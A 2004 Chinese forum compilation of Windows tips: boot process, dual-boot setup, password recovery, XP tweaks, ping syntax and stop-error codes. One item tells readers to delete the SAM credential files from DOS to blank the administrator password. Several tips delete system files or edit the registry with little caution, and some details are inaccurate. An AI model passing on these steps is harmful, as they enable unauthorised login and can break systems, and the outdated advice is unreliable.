    第七步： 标准设备检测完毕后，系统BIOS内部的支持即插即用的代码将开始检测和配置系统中安装的即插即用设备，每找到一个设备之后，系统BIOS都会在屏幕上显示出设备的名称和型号等信息，同时为该设备分配中断、DMA通道和I/O端口等资源。
    第八步： 到这一步为止，所有硬件都已经检测配置完毕了，多数系统BIOS会重新清屏并在屏幕上方显示出一个表格，其中概略地列出了系统中安装的各种标准硬件设备，以及它们使用的资源和一些相关工作参数。
    第九步： 接下来系统BIOS将更新ESCD（Extended System Configuration Data，扩展系统配置数据）。ESCD是系统BIOS用来与操作系统交换硬件配置信息的一种手段，这些数据被存放在CMOS（一小块特殊的RAM，由主板上的电池来供电）之中。通常ESCD数据只在系统硬件配置发生改变后才会更新，所以不是每次启动机器时我们都能够看到“Update ESCD… Success”这样的信息，不过，某些主板的系统BIOS在保存ESCD数据时使用了与Windows 9x不相同的数据格式，于是Windows 9x在它自己的启动过程中会把ESCD数据修改成自己的格式，但在下一次启动机器时，即使硬件配置没有发生改变，系统BIOS也会把ESCD的数据格式改回来，如此循环，将会导致在每次启动机器时，系统BIOS都要更新一遍ESCD，这就是为什么有些机器在每次启动时都会显示出相关信息的原因。
    第十步： ESCD更新完毕后，系统BIOS的启动代码将进行它的最后一项工作，即根据用户指定的启动顺序从软盘、硬盘或光驱启动。以从C盘启动为例，系统BIOS将读取并执行硬盘上的主引导记录，主引导记录接着从分区表中找到第一个活动分区，然后读取并执行这个活动分区的分区引导记录，而分区引导记录将负责读取并执行IO.SYS，这是DOS和Windows 9x最基本的系统文件。Windows 9x的IO.SYS首先要初始化一些重要的系统数据，然后就显示出我们熟悉的蓝天白云，在这幅画面之下，Windows将继续进行DOS部分和GUI（图形用户界面）部分的引导和初始化工作。
    如果系统之中安装有引导多种操作系统的工具软件，通常主引导记录将被替换成该软件的引导代码，这些代码将允许用户选择一种操作系统，然后读取并执行该操作系统的基本引导代码（DOS和Windows的基本引导代码就是分区引导记录）。 　　上面介绍的便是计算机在打开电源开关（或按Reset键）进行冷启动时所要完成的各种初始化工作，如果我们在DOS下按Ctrl＋Alt＋Del组合键（或从Windows中选择重新启动计算机）来进行热启动，那么POST过程将被跳过去，直接从第三步开始，另外第五步的检测CPU和内存测试也不会再进行。我们可以看到，无论是冷启动还是热启动，系统BIOS都一次又一次地重复进行着这些我们平时并不太注意的事情，然而正是这些单调的硬件检测步骤为我们能够正常使用电脑提供了基础。
现在市场上主流的品牌机随机安装的操作系统一般为Windows XP，但是，部分用户可能仍然对Windows 98、Windows ME或Windows 2000等操作系统情有独钟，希望能在不破坏原操作系统的前提下，再安装一下以上操作系统。按常规来说，如不使用第三方的软件，我们在安装微软的Windows系列操作系统时，应该按照从低版本到高版本的顺序来依次安装；如果使用第三方的软件，又会涉及到所使用的软件的版权及用法问题，对一般用户来说显然是不太合适的。其实，按我们在本文提供的方法，不使用第三方的任何软件也能实现操作系统反着装，而且十分简单！
例如我的联想品牌机，硬盘的C区安装Windows XP家庭版，C区的文件格式为FAT 32，其它分区的文件系统也是FAT 32。使用本文的办法来安装Windows 98，C区和安装Windows 98的分区的文件系统均需要转化为FAT 32，否则需要第三方的启动软件。当然，如果文件格式为NTFS，我们可以使用“Partition Magic”这款软件来将它无损转换为FAT 32。
准备：支持光驱启动的Windows 98/ME启动软盘；DEBUG.EXE文件（可从Windows\Command文件夹中拷贝到启动软盘，或从EBD.CAB中解压缩出来）。
步骤：
第一部分：
安装Windows 98/ME操作系统
1.将Windows 98/ME的安装光盘放入光驱； 2.使用制作好的启动盘来启动电脑；
3.按照正常的安装Windows 98/ME的方法来安装操作系统；只是不要将Windows 98/ME安装在Windows XP所在的分区；
4.安装好之后，将电脑启动到Windows 98/ME操作系统。
第二部分：
修改“BOOTSECT．DOS”文件
按照以上方法安装Windows 98/ME操作系统之后，会修改Windows XP所必需的启动文件，我们需要对“BOOTSECT.DOS”文件进行修改以修复它的启动文件。
1.打开“记事本”或其它的文本编辑软件来制作“READ.SCR”（文件名可以更改），内容如下：
L 100 2 0 1
N C:\BOOTSECT.DOS
R BX
0
R CX
200
W
Q
2.将以上制作好的文件拷贝到启动盘中；
3.用启动盘启动电脑到DOS方式；
4.修改“BOOTSECT.DOS”的文件属性，使用以下命令：
ATTRIB C:\BOOTSECT.DOS -S -H -R
5.在命令提示符下输入：DEBUG

第三部分：
修复Windows XP
1.修改BIOS中的启动选项，使电脑能从光驱启动；也可以使用刚才制作好的启动盘来启动电脑，再在命令提示下输入f:\i386\winnnt.exe（f为光驱的盘符）来运行安装指令；
2.在安装Windows XP时，我们要选择“修复”项，以修复硬盘中已安装的操作系统；
3.选择需要登录的操作系统，通常为“1”，键入“1”，并输入管理员口令（安装时所设定的，安装Windows XP家庭版的联想品牌机的用户只需要按回车键即可）；
4.在命令提示符下键入“FIXBOOT”,以修复Windows XP的启动文件；
5.拿出光驱中的Windows XP安装光盘，重新启动电脑，并在BIOS修改启动选项，将它设置为从硬盘启动。
现在，你就可以看到Windows XP的启动菜单了，并能选择所需要进入的操作系统。重新启动电脑之后，我们就可以选择需要启动的操作系统了。是不是很简单？
第四部分：
WinXP下安装Win2000
在安装好Windows XP之后，再安装Windows 2000比安装98或ME要简单得多。本文所说的方法也不用第三方的软件，而且可以在FAT32 或NTFS的文件格式上进行操作。
1.首先，打开“控制面板”，选择“文件夹选项”并双击，在“文件夹选项”窗口中选择“查看”，在“高级设置”中将“隐藏受保护的操作系统文件”前的“√”去掉，以显示我们所需要的两个系统文件：“NTLDR”和“NTDETECT．COM”；
2.将以上两个文件拷贝到一张软盘中；
3.修改BIOS中的启动选项以从光盘启动电脑，并运行Windows 2000的安装操作程序；
4.按正常方法安装Windows 2000；
5.安装完成后，将电脑启动到Windows 2000；
6.将我们拷贝到软盘中的以上两个文件拷贝到C区根目录；如果系统提示不能拷贝，用户需要修改以上两个文件的属性，去掉它们的“只读”和“隐藏”等属性。
说明：我们这儿所以这样做是因为Win XP版本的“NTLDR”和“NTDETECT．COM”支持启动Windows 2000，但是后者并不支持启动到前者，所以我们需要进行以上操作。
--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:22　　 标题: 整理了七个小时的东东！[申请加精]

十八。★★★Windows 2k/XP登录口令丢失的解决办法
1. DOS开机.
2. cd 进入WINNT\system32\config
3.把它的隐藏性取消 attrib -h SAM.LOG
4.删除SAM 文件del sam.*
5.拿走软盘,再进入Win2000时administrator密码已变成空白.按ENTER便能进入.

Windows XP的安全性能可以说提高了不少，您可以通过对自己的账号设置密码来保护自己的隐私，但是如果您自己忘记了这个密码那该怎么办呢？
    借助密码重设盘的帮助
    为了在用户忘记了密码的情况下保护用户账号，每个本地用户都应制作密码重设盘并将它保存在安全地方。这样当用户忘记了自己的密码时，就可使用密码重设盘来重设密码，从而使用户能继续访问此本地用户账号，而且原数据不会丢失。
    执行该任务的步骤有所不同，这依赖于计算机是否是网络域(域，构成部分网络并共享一个通用目录数据库的一组计算机。一个域作为一个单元来管理，并且带有共同的规则和过程。每个域有一个唯一的名称)的成员或工作组(工作组，简单的计算机分组，只希望帮助用户在该组中完成查找诸如打印机和共享文件夹这样的事。Windows中的工作组不提供域所提供的集中用户账号和身份验证)的一部分或是单独的计算机。下面以不同情况分别介绍。
    1.计算机在域中
    方法：
    ①按CTRL+ALT+DELETE组合键打开“Windows安全”对话框。
    ②单击“更改密码”。
    ③单击“备份”打开忘记密码向导。
    ④单击“下一步”，然后按照屏幕上出现的指令操作即可得到一张密码重设盘。
    2.计算机不在域中
    方法：单击“开始”/“控制面板”/“用户账号”，在弹出的对话框中选择你的账号，然后点击“阻止一个已忘记的密码”项，如图1，接下来按照“忘记密码向导”一步一步往下走，直至完成，就可以得到一张密码重设盘。别忘了把它收好！别人用它也可以轻而易举地登录您的账户。
    3.密码重设盘的应用
    如果在启动自己账号的时候您竟然忘记了登录密码，那么接下来就用到密码重设盘了，方法很简单：将密码重设盘插入软驱，点击你账户旁边向右的箭头，再在弹出的提示框中点击使用密码重设盘，按照弹出的“密码重设向导”提示便可更改密码并启动计算机。然后您就可以将密码重设盘放回安全的地方了，并不需要重新创建新的密码重设盘，无论您更改多少次密码，这张盘都是有效的。
    借助具有管理员权限用户的帮助
    如果您没有创建密码重设盘，那么忘记了账号登录密码该怎么办呢？这就要请求具有管理员权限的用户来帮助您，该方法也有两种不同的情况。
    1.如果您的计算机拥有一个管理员账号(administrator账号以外的)，您就能使用此账户登录并可以创建和更改计算机上所有用户的密码。单击“开始”/“控制面板”/“用户账号”，选择忘记密码的账户名并点击“更改密码”(如果您的计算机连接到域，则显示为“重设密码”)，如图2。根据向导提示一步一步完成更改密码，以后以新更改的密码登录即可。
    2.如果您的计算机没有一个管理员账号，那只能用系统管理员administrator账号登录并更改计算机上用户的密码。administrator管理员账号只有在没有其它账号(除来宾账号guest外)存在或您以安全模式启动计算机时才在欢迎屏幕上可见，这时根据您机器设置也有两种解决方法。
    一种是直接以安全模式启动计算机(在机器启动的瞬间，按F8键，选择第一项“安全模式”回车)，在欢迎屏幕上选择administrator管理员账号登录Windows系统，剩下的就和上面的方法相同了。
    另一种是您以前若更改了组策略设置，强迫用户使用了“典型”登录屏幕登录到计算机(单击“开始”/“运行”，在对话框中输入“gpedit.msc”打开组策略，如图3，再依次展开“计算机配置”/“管理摸板”/“系统”/“登录”，在右面选中“总是用传统登录”，设置为“已启用”)。这样在登录时将出现一个带有输入对话框的欢迎界面(若禁用或未配置则不可选administrator项)，只需在对话框内输入“administrator”及口令即可登录，这样就不用以安全模式启动计算机了，其余更改密码的方法同上。
    小提示：如果拥有计算机管理员账号的用户更改另一个用户的密码，系统为了保护受保护信息的安全，可能会引起数据丢失，部分类型的信息将不可再访问，这些信息包括：经过用户公钥加密的电子邮件；保存在计算机上或由计算机记录的Internet密码；已由用户加密的文件。因此，笔者强烈建议大家采用密码重设盘功能来重设密码。
    借助第三方密码恢复软件
    当今各种密码恢复软件也有很多，比如Windows XP/2000/NT Key等，它可以帮助你恢复忘记或遗失Windows XP/2000/NT操作系统启动密码。大家不妨在网上找一下

--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:23　　 标题: 整理了七个小时的东东！[申请加精]

十九。★★★学会xp的20个技巧
不少Windows XP用户抱怨系统关机等待时间太长，磁盘占用高，某些操作没有Windows 98快速等问题。本文从细处着手，活学活用的角度，比较详细的讲述了20则使用技巧，希望对大家提高应用技能有所帮助。
    1、在记事本中自动记录文件的打开时间
    在记事本中，我们可 以记录每次打开某个文本文件的时间，方法为：在该文件的第一行输入“.LOG”(注意：必须大写！)，然后换行开始正文。这样在每次打开了该文件之后在关闭时会自动在文件后面添加当前时间
    2、快速浏览脱机网页
    需要脱机浏览某个已经打开过的网页，传统的方式是按照在线打开的顺序一个链接一个链接地找到并打开这个网页。比较快的方式是将这个网页添加到收藏夹，以后在脱机方式下从收藏夹中浏览这个网页。其实，为这个网页建立一个快捷方式是最快的方法。在浏览器的地址栏中，已打开网页的网址前面都有一个小图标，用鼠标按住这个小图标，把它拖到桌面上，下次就可以在桌面快速脱机浏览这个网页了。
    3、快速发邮件
    在"开始"菜单上单击鼠标右键，选择"打开"，在打开的窗口中单击鼠标右键，选择"新建"---"快捷方式"，然后在"请键入项目的位置"框中输入"mailto:"，单击"下一步"，在"键入该快捷方式的名称"框中输入名称，单击"完成"即可。以后只需单击此快捷方式就可创建一封新电子邮件。如果你经常给某个朋友发电子邮件的话，可以专门为这个朋友创建一个快捷方式。方法同上面说的差不多。比如你的朋友的电子邮件地址是abc@chinabyte.com那么你只要在“请输入项目的位置”框中输入"mailto:abc@chinabyte.com"就行了,其余不变。
    4、将所喜爱的程序放置在开始菜单顶部附近
    你是否对某个程序非常喜爱且经常使用呢？那么，应通过将其放置在列表顶部的方式提高它在开始菜单中的优先级。这种方式能够确保该程序保持在开始菜单中，且不受其它程序的干扰，即便其它程序具有更高的使用频率也是如此。在开始菜单上右键单击指向你所喜爱程序的链接，并在随后出现的快捷菜单中选择“附到‘开始’菜单”上。你的程序将被永久移动到列表顶部，仅仅位于浏览器与电子邮件程序下方。
    5、为Capslock增加响铃
    输入中文时不慎按动Capslock会变为大写英文，给此键加个“响铃”就放心多了。方法是：打开“控制面板”的“辅助选项”，在“键盘”项中，选择“使用切换键”。
    6、利用回收站给文件夹加密
    (1)首先，单击“我的电脑→查看→文件夹选项”，选中“显示所有文件”，单“确定”。
    (2)进入系统根目录，右击“回收站”，(即名为“Recycled”的文件夹)，在弹出的快捷菜单对话框中选中“启用缩略图查看方式”，然后点击“应用”，你会发现，系统自动将“只读”属性选中了，你需要手动除去“只读”属性，然后单击“确定”。这时你会发现图标变成了一个普通文件夹的样子，这时再双击“Recycled”文件夹，找到一个名为“desktop.ini”的初始化文件，并激活它，复制到你需要加密的文件下，如“d:\MyFiles”文件夹下面。
    (3)然后右击“d:\MyFiles”文件夹，选择属性，在弹出的对话框中确保“只读”属性被选中，然后在“启用缩略图查看方式”复选框前打上钩，然后确定即可。
    7、临时为自己分配管理权限
    许多程序在安装过程中都要求你具备管理权限。这里介绍了一种以普通用户身份登录的情况下，临时为自己分配管理权限的简单方法。在右键单击程序安装文件的同时按住“Shift”键。在随后出现的快捷菜单中点击“运行方式”，输入具有相应管理权限的用户名和密码。这种方式对于开始菜单上的应用程序同样适用。
    8、拒绝分组相似任务栏
    虽然Windows XP “分组相似任务栏按钮”设置虽然可以让你的任务栏少开窗口，保持干净，但对于一些需要打开同类多个窗口的工作非常不便,。如你是经常用QQ这样的通讯软件和人在线聊天的话，如果有两个以上的好友同时和你交谈，你马上会感到XP这种默认设置造成的不便――每次你想切换交谈对象的时候，要先点击组，然后弹出的菜单里再选要交谈的好友，而且每个好友在组里显示的都是一样的图标，谈话对象多的时候，你可能要一个个的点击来看到底刚才是谁回复了话，在等着你反应，而且选错了一个，又得从组开始选，很麻烦。显然地，这样不如原来的开出几个窗口，在任务栏里的各个小窗口点击一次就可进行开始聊天。更改方法：点击“开始→控制面板→外观和主题→任务栏和‘开始’菜单”，在弹出的窗口内，将“分组相似任务栏按钮”选项前面的钩去掉。
    9、更改文件日期
    要修改XXX.exe(任意exe文件)的日期，可以在MS-DOS方式下键入copy XXX.exe+,,(注：加号后紧跟2个逗号)，系统询问时键入“Y”即更改为当前日期。
    10、卸载无用的动态链接
    资源管理器经常在内存中留下无用的动态链接，为了消除这种现象，你可以打开注册表编辑器，设置键值：HKEY_LOCAL_MACHINE\ SOFTWARE \Microsoft\Windows\CurrentVersion\EXPlorer\AlwaysUnloadDLL=DWORD: 1将其设为0，这一功能就会被关闭。注意：为了让设置生效，需要重新启动计算机。
    XP使用预读设置这一新技术，以提高系统速度。如果你拥有PIII 800, 512M内存以上，推荐一下修改： 1.运行“regedit” 2.去[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher>; 3.设置数值0，1，2，3。0-Disable,1-预读应用程序,2-启动预读,3-前两者皆预读 ("3"，推荐使用)。 4.重启。 这样可以减少启动时间。
    12、清除预读文件
    当XP使用一段时间后，预读文件夹里的文件会变得很大，里面会有死链文件，这会减慢系统时间。建议：定期删除这些文件。(Windows\prefetch)
    13、删除系统多余的dll文件
    “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\sharedlls”记录共享的dll信息，后面的数字表示当前的dll文件被几个应用程序共享着，如果它的值是0的话，说明它是多余的，你尽可以把它给删除了
    14、使ZIP文档读取能力失效
    Windows XP默认支持ZIP文档，但系统会为此耗费大量资源，你可以将这一功能关闭，只需在“开始”选单的“运行”中输入“regsvr32/u zipfldr.dll”即可
    15、临时文件会影响系统的性能
    进入“Internet 选项”中点“Internet临时文件夹”中的“设置”按钮，在打开对话框中点“移动文件夹”把Internet临时文件夹移到别的盘区，不要让它和系统文件处在同一盘区内，这是因为临时文件小、多、乱，会产生好多的碎片，如果让它和系统文件放在一起会影响到系统的性能。
    16、快速关闭一系列窗口
    用户通过“我的电脑”打开一个深层文件夹时，将依次打开很多窗口，逐一关闭颇麻烦。用户若在关闭最下一层窗口时按下Shift键，则所有的窗口将同时被关闭。若关闭中间某一层窗口时按下Shift键则其上层窗口都会被关闭，而下层窗口将保持不变
    微软公司这个回收站，时间长了，我们难免想给这个特殊对象取个另样的名称，要做到这一点并不难，只要我们打开注册表编辑器程序，并打开{HKEY_CLASSES_ROOT\CLSID\[645FF040-5081-101B-9F08-00AA002F954E>}分支，将其下的“回收站”改为自己喜欢的名称，如“垃圾筒”即可。到桌面上刷新一下，一个“垃圾筒”就出现在桌面上了
    17、删除不必要的程序
    另外，大家在安装WinXP的时候，或许一时贪心把所有程序全部安装，后来才发觉根本没有用。可是在控制面板的“添加/删除程序”中却找不到踪影。这时，你可以利用以下的方法逼它们现身： 需先显示隐藏文件及文件夹，请执行以下操作步骤： 单击“开始→控制面板→工具→文件夹选项”，在查看选项卡列表中的隐藏文件和文件夹分支下，点击“显示所有文件和文件夹”。 如需编辑添加/删除Windows组件对话框，请执行以下操作步骤： 首先，为确保在必要时能够恢复到初始配置状态，请在开始操作前保留sysoc.inf文件(位于硬盘上\Windowst\inf\Sysoc.inf文件夹中)的一个备份，并为该备份指定一个不同的名称，如Sysoc2.inf。打开Sysoc.inf文件。该文件中的每一行文本代表一个能够在添加/删除Windows组件对话框显示的组件。 例如:你可以把Pinball=ocgen.dll,OcEntry,pinball.inf,HIDE,7 改成Pinball=ocgen.dll,OcEntry,pinball.inf,,7 保存Sysoc.inf文件，随后，将其关闭并重新启动计算机。之后，你就可以在控制面板的“添加/删除”中删掉弹珠台游戏。 手续其实十分简单，对于那些希望在对话框中看到的组件，删除相应文本行中的单词HIDE(不要删除逗号)。但是要注意，这种方法不能删除Fax Services等Win核心组件。
    在你想自动运行的盘生成“autorun.inf”文件并用记事本打开，写入： [Autorun> open=(在这里填入想自动运行的程序，如：C：\Windows\notepad.exe，后面加参数/autorun) icon=(在这里填入一些图标，如：C：\123.ico) 这样我们的硬盘就与一些光盘一样，在打开的时候就会自动运行设定的程序。
    18、在Windows98恢复在DOS下删除的文件
    在Windows98的回收站中只能恢复在Windows里删除的内容，用以下方法可在Windows98的DOS模式下恢复删除的文件：先运行“Lock”命令，解除Windows对磁盘访问的限制。再使用命令“UnDelete”恢复。或重新启动进DOS，运行“UnDelete”也行，不过动作要快，否则可能恢复不了。
    19、快速重启动
    我们每次重新启动计算机时，计算机都要检测系统和硬件，这需要花费一定的时间。为了能够快速重新启动，我们可以按照以下的步骤进行操作：单击"开始"按钮，选"关闭系统"，在弹出的"关闭Widows对话框中"，选择"重新启动计算机"，然后按住Shift键的同时单击"是"按钮，这样就能跳过对系统和硬件的检测，从而达到快速重新启动计算机的目的。
    20、快速清空回收站
    有时候，回收站里文件太多或者是在不同的地方，此时用“清空回收站”的命令就很慢，很多时候可以这样来：选取全部文件，然后删除，这样快很多。
    附： Windows XP安全减肥法 ：以下方法为本人目前的winXP的减肥法，经过使用，觉得比较安全，效果明显，至少可以减少300m空间。注意：不建议初学者使用
    删除驱动备份： Windows\Driver cache\i386目录下的Driver.cab文件(73MB) 但是以后我们每次安装新硬件时必须插入Windows的安装光盘删除系统文件备份(一般不怎么用到的): 运行命令行sfc /purgecache
    删掉备用的dll文件： 只要你拷贝了安装文件或者有安装光盘，可以这样做。Windows\system32\dllcache下文件(减去200——300mb)。

--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:24　　 标题: 整理了七个小时的东东！[申请加精]

二十。★★★关于ping
Ping通过发送“网际消息控制协议 (ICMP)”回响请求消息来验证与另一台 TCP/IP 计算机的 IP 级连接。回响应答消息的接收情况将和往返过程的次数一起显示出来。Ping 是用于检测网络连接性、可到达性和名称解析的疑难问题的主要 TCP/IP 命令。如果不带参数，ping 将显示帮助。
语法
ping [-t] [-a] [-n Count] [-l Size] [-f] [-i TTL] [-v TOS] [-r Count] [-s Count] [{-j HostList | -k HostList}] [-w Timeout] [TargetName]
参数
-t
指定在中断前 ping 可以持续发送回响请求信息到目的地。要中断并显示统计信息，请按 CTRL-BREAK。要中断并退出 ping，请按 CTRL-C。
-a
指定对目的地 IP 地址进行反向名称解析。如果解析成功，ping 将显示相应的主机名。
-n Count
指定发送回响请求消息的次数。默认值为 4。
-lSize
指定发送的回响请求消息中“数据”字段的长度（以字节表示）。默认值为 32。size 的最大值是 65,527。
-f
指定发送的回响请求消息带有“不要拆分”标志（所在的 IP 标题设为 1）。回响请求消息不能由目的地路径上的路由器进行拆分。该参数可用于检测并解决“路径最大传输单位 (PMTU)”的故障。
-i TTL
指定发送回响请求消息的 IP 标题中的 TTL 字段值。其默认值是是主机的默认 TTL 值。对于 Windows XP 主机，该值一般是 128。TTL 的最大值是 255。
-v TOS
指定发送回响请求消息的 IP 标题中的“服务类型 (TOS)”字段值。默认值是 0。TOS 被指定为 0 到 255 的十进制数。
-r Count
指定 IP 标题中的“记录路由”选项用于记录由回响请求消息和相应的回响应答消息使用的路径。路径中的每个跃点都使用“记录路由”选项中的一个值。如果可能，可以指定一个等于或大于来源和目的地之间跃点数的 Count。Count 的最小值必须为 1，最大值为 9。
-s Count
指定 IP 标题中的“Internet 时间戳”选项用于记录每个跃点的回响请求消息和相应的回响应答消息的到达时间。Count 的最小值必须为 1，最大值为 4。
-jPath
指定回响请求消息使用带有 HostList 指定的中间目的地集的 IP 标题中的“稀疏资源路由”选项。可以由一个或多个具有松散源路由的路由器分隔连续中间的目的地。主机列表中的地址或名称的最大数为 9，主机列表是一系列由空格分开的 IP 地址（带点的十进制符号）。
-k HostList
指定回响请求消息使用带有 HostList 指定的中间目的地集的 IP 标题中的“严格来源路由”选项。使用严格来源路由，下一个中间目的地必须是直接可达的（必须是路由器接口上的邻居）。主机列表中的地址或名称的最大数为 9，主机列表是一系列由空格分开的 IP 地址（带点的十进制符号）。
-w Timeout
指定等待回响应答消息响应的时间（以微妙计），该回响应答消息响应接收到的指定回响请求消息。如果在超时时间内未接收到回响应答消息，将会显示“请求超时”的错误消息。默认的超时时间为 4000（4 秒 ）。
TargetName
指定目的端，它既可以是 IP 地址，也可以是主机名。
/?
在命令提示符显示帮助。
注释
可以使用 ping 测试计算机名和计算机的 IP 地址。如果已成功验证 IP 地址但未成功验证计算机名，这可能是由于名称解析问题所致。在这种情况下，要确保指定的计算机名可以通过本地主机文件进行解析，其方法是通过域名系统 (DNS) 查询或 NetBIOS 名称解析技术进行解析。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时，该命令才可用。
范例
以下范例显示 ping 的输出：
C:\>ping example.microsoft.com
Pinging example.microsoft.com [192.168.239.132] with 32 bytes of data:
Reply from 192.168.239.132: bytes=32 time=101ms TTL=124
Reply from 192.168.239.132: bytes=32 time=100ms TTL=124
Reply from 192.168.239.132: bytes=32 time=120ms TTL=124
Reply from 192.168.239.132: bytes=32 time=120ms TTL=124
要验证目的地 10.0.99.221 并解析 10.0.99.221 的主机名，请键入：
ping -a 10.0.99.221
要验证带有 10 个回响请求消息的 10.0.99.221，且每个消息的“数据”字段值为 1000 字节，请键入：
ping -n 10 -l 1000 10.0.99.221
要验证目的地 10.0.99.221 并记录 4 个跃点的路由，请键入：
ping -r 4 10.0.99.221
要验证目的地 10.0.99.221 并指定稀疏来源路由为 10.12.0.1-10.29.3.1-10.1.44.1，请键入：
ping -j 10.12.0.1 10.29.3.1 10.1.44.1 10.0.99.221
--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:24　　 标题: 整理了七个小时的东东！[申请加精]

二十一。★★★windows非法操作详解
家肯定都用过Windows的，想必经历过“非法操作”。一般的“非法操作”有两个选项：“关闭”和“详细资料”。可是“详细资料”里面的内容大多数人都看不明白，只好草草的关闭了。现在不用怕了，我来给大家讲解一下非法作的每个详细资料的具体含义。
1.停止错误编号:0x0000000A
说明文字:IRQL-NOT-LESS-OR-EQUAL
通常的原因:驱动程序使用了不正确的内存地址.
解决方法：如果无法登陆,则重新启动计算机.当出现可用的作系统列表时,按F8键.在Windows高级选项菜单屏幕上,选择"最后一次正确的配置",然后按回车键.
检查是否正确安装了所有的新硬件或软件.如果这是一次全新安装,请与硬件或软件的制造商联系,获得可能需要的任何Windows更新或驱动程序.
运行由计算机制造商提供的所有的系统诊断软件,尤其是内存检查.
禁用或卸掉新近安装的硬件(RAM,适配器,硬盘,调制解调器等等),驱动程序或软件.
确保硬件设备驱动程序和系统BIOS都是最新的版本.
确保制造商可帮助你是否具有最新版本,也可帮助你获得这些硬件.
禁用 BIOS内存选项,例如cache或shadow.
2.停止错误编号:0x0000001E
说明文字:KMODE-EXPTION-NOT-HANDLED
通常的原因:内核模式进程试图执行一个非法或未知的处理器指令.
解决方法：确保有足够的空间,尤其是在执行一次新安装的时候.
如果停止错误消息指出了某个特定的驱动程序,那么禁用他.如果无法启动计算机.应试着用安全模式启动,以便删除或禁用该驱动程序.
如果有非 Microsoft支持的视频驱动程序,尽量切换到标准的VGA驱动程序或Windows提供的适当驱动程序.
禁用所有新近安装的驱动程序.
确保有最新版本的系统BIOS.硬件制造商可帮助确定你是否具有最新版本,也可以帮助你获得他.
BIOS内存选项,例如cache,shadow.
3.停止错误编号:0x00000023或0x00000024
说明文字:FAT-FILE-SYSTEM或MTFS-FILE-SYSTEM
通常原因:问题出现在Ntfs.sys(允许系统读写NTFS驱动器的驱动程序文件)内.
解决方法：运行由计算机制造商提供的系统诊断软件,尤其是硬件诊断软件..
禁用或卸载所有的反病毒软件,磁盘碎片整理程序或备份程序.
通过在命令提示符下运行Chkdsk /f命令检查硬盘驱动器是否损坏,然后重新启动计算机
4.停止编号:0x0000002E
说明文字ATA-BUS-ERROR
通常的原因:系统内存奇偶校验出错,通常由硬件问题导致.
解决方法：卸掉所有新近安装的硬件(RAM.适配器.硬盘.调制解调器等等).
运行由计算机制造商提供的系统诊断软件,尤其是硬件诊断软件.
确保硬件设备驱动程序和系统BIOS都是最新版本.
使用硬件供应商提供的系统诊断,运行内存检查来查找故障或不匹配的内存.
禁用BIOS内存选项,例如cache或shadow.
在启动后出现可用作系统列表时,按F8.在Windows高级选项菜单屏幕上,选择"启动VGA模式:.然后按回车键.如果这样做还不能解决问题,可能需要更换不同的视频适配器列表,有关支持的视频适配器列表,请参阅硬件兼容性列表.

5.停止编号:0x0000003F
说明文字:NO-MOR-SYSTEM-PTES
通常的原因:每哟正确清理驱动程序.
解决方法：禁用或卸载所有的反病毒软件，磁盘碎片处理程序或备份程序.
6:停止错误编号:0x00000058
说明文字:FTDISK-INTERN-ERROR
通常的原因:容错集内的某个主驱动器发生故障.
解决方法：使用Windows安装盘启动计算机,从镜象(第2)系统驱动器引导.有关如何编辑Boot.ini文件以指向镜象系统驱动器的指导,可在MIcrosoft支持服务Web站点搜索"Edit ARC path".
7.停止错误编号:0x0000007B
说明文字:INACCESSI-BLE-BOOT-DEVICE
通常原因:初始化I/O系统(通常是指引导设备或文件系统)失败.
解决方法：引导扇区病毒通常会导致这种停止错误.是用反病毒软件的最新版本,检查计算机上是否有存在病毒.如果找到病毒,则必须执行必要的不找把他从计算机上清除掉,请参阅反病毒软件文档了解如何执行这些步骤.
卸下所有新近安装的硬件(RAM,适配器,调制解调器等等).
核对MIcrosoft硬件兼容性列表以确保所有的硬件和驱动程序都与Windows兼容.
如果使用的适SCSI适配器,可以从硬件供应商除获得最新WINDOWS驱动程序,禁用SCSI设备的同步协商,检查该SCSI链是否终结,并核对这些设备的SCSI ID,如果无法确定如何执行能够这些步骤,可参考硬件设备的文档.
如果你用的是IDE设备,将板上的IDE端口定义为唯一的主端口.核对IDE设备的主/从/唯一设置.卸掉除硬盘之外的所有IDE设备.如果无法确认如何执行这些不找，可参考硬件文档.
如果计算机已使用NTFS文件系统格式化,可重新启动计算机,然后在该系统分区上运行Chkdsk /f/r命令.如果由于错误而无法启动系统,那么使用命令控制台,并运行Chkdsk /r命令.
运行Chkdsk /f命令以确定文件系统是否损坏.如果Windows不能运行Chkdsk命令,将驱动器移动到其他运行Windows的计算机上,然后从这台计算机上对该驱动器运行Chkdsk命令.
8.停止错误编号:0x0000007F
说明文字:UNEXPECTED-KERNEL-MODE-TRAP
通常的原因:通常是由于硬件或软件问题导致,但一般都由硬件故障引起的..
解决方法：核对Microsoft硬件兼容性列表以确保所有的硬件和驱动程序都与Windows兼容.如果计算机主板不兼容就会产生这个问题.
卸掉所由新近安装的硬件.
运行由计算机制造商提供的所有系统诊断软件,尤其是内存检查.
禁用BIOS内存选项,例如cache或shadow.
9.停止错误编号:0x00000050
说明文字AGE-FAULT-IN-NONPAGED-AREA
通常的原因:内存错误(数据不能使用分页文件交换到磁盘中).
解决方法：卸掉所有的新近安装的硬件.
运行由计算机制造商提供的所有系统诊断软件.尤其是内存检查.
检查是否正确安装了所有新硬件或软件,如果这是一次全新安装,请与硬件或软件制造商联系,获得可能需要的任何Windows更新或驱动程序.
禁用或卸载所有的反病毒程序.
禁用BIOS内存选项,例如cache或shadow.
10.停止错误编号:0x0000007
说明文字：KERNEL-STEL-STACK-INPAGE-ERROR
通常的原因：无法从分页文件将内核数据所需的页面读取到内存中。
解决方法：使用反病毒软件的最新版本，检查计算机上是否有病毒。如果找到病毒，则执行必要的步骤把他从计算机上清除掉。请参阅制造商提供的所有系统诊断软件，尤其是内存检查。
禁用BIOS内存选项，例如cache,shadow.
11.停止错误编号：0x00000079
说明文字：MISMATCHED-HAL
通常的原因：硬件抽象层与内核或机器类型不匹配（通常发生在单处理器和多处理器配置文件混合在同一系统的情况下）。
解决方法：要解决本错误，可使用命令控制台替换计算机上错误的系统文件。
